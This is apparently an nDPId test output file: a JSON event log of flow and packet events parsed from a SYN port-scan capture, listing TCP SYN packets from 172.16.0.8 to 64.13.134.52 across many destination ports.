-00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/UAADIGmn2sEAAIQA2GNIzTHQvdU4MZAAAAAGACDAAPgQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAshW8AADkGigOsEAAIQA2GNIzTAVTdU4MZAAAAAGACCAAvOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAs8AUAADIGJm2sEAAIQA2GNIzTB9LdU4MZAAAAAGACDAAkugAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsrEwAADAGbCasEAAIQA2GNIzTAojdU4MZAAAAAGACBAAyBAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse4wAACkGo+asEAAIQA2GNIzTAnfdU4MZAAAAAGACCAAuFQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuCkAACUGa0msEAAIQA2GNIzTBAndU4MZAAAAAGACCAAsgwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsiJEAACgGl+GsEAAIQA2GNIzTGafdU4MZAAAAAGACBAAa5QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsheEAACgGmpGsEAAIQA2GNIzTCcTdU4MZAAAAAGACBAAqyAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsxa0AACsGV8WsEAAIQA2GNIzTBDndU4MZAAAAAGACEAAkUwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsPY4AADEG2eSsEAAIQA2GNIzTwAndU4MZAAAAAGACCABwggAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4wAADMG5easEAAIQA2GNIzTBdzdU4MZAAAAAGACEAAisAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AMAADIGIm+sEAAIQA2GNIzTAQjdU4MZAAAAAGACDAArhAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpEAADgG5eGsEAAIQA2GNIzTCD\/dU4MZAAAAAGACBAAsTQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xAAADkGLGKsEAAIQA2GNIzTADHdU4MZAAAAAGACCAAwWwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsmJ8AACYGidOsEAAIQA2GNIzTD6LdU4MZAAAAAGACDAAc6gAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsMFwAADAG6BasEAAIQA2GNIzTBDTdU4MZAAAAAGACBAAwWAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsgoUAACoGm+2sEAAIQA2GNIzTBd\/dU4MZAAAAAGACDAAmrQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsxtwAADAGUZasEAAIQA2GNIzTF3HdU4MZAAAAAGACBAAdGwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs8kIAADQGIjCsEAAIQA2GNIzTgAPdU4MZAAAAAGACBAC0iAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsZjgAAC4GtDqsEAAIQA2GNIzTAaHdU4MZAAAAAGACDAAq6wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNkAACsGwJmsEAAIQA2GNIzTH0vdU4MZAAAAAGACEAAJQQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KkAACwGO8msEAAIQA2GNIzTI1DdU4MZAAAAAGACBAARPAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsHMUAACYGBa6sEAAIQA2GNIzTFGrdU4MZAAAAAGACDAAYIgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsfkQAADQGli6sEAAIQA2GNIzTFiLdU4MZAAAAAGACBAAeagAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YwAADMGQ+asEAAIQA2GNIzTB5vdU4MZAAAAAGACEAAg8QAAAgQFtA=="} 